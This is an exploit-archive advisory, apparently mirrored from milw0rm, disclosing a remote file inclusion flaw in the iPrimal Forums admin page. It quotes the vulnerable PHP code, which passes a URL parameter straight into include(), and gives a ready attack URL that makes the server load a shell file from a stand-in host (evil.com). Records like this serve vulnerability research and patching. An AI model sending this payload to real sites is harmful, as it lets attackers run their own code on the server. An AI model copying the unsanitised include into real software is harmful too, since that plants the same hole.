exploit-db-mirror/exploits/php/webapps/2739.txt

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download:http://ipigroup.org/downloads/forums.zip
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code:   #line 126-129
.....
if($_GET['p'] == ''){

echo 'Please select an item from the menu above.';

}else{

include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!

# milw0rm.com [2006-11-08]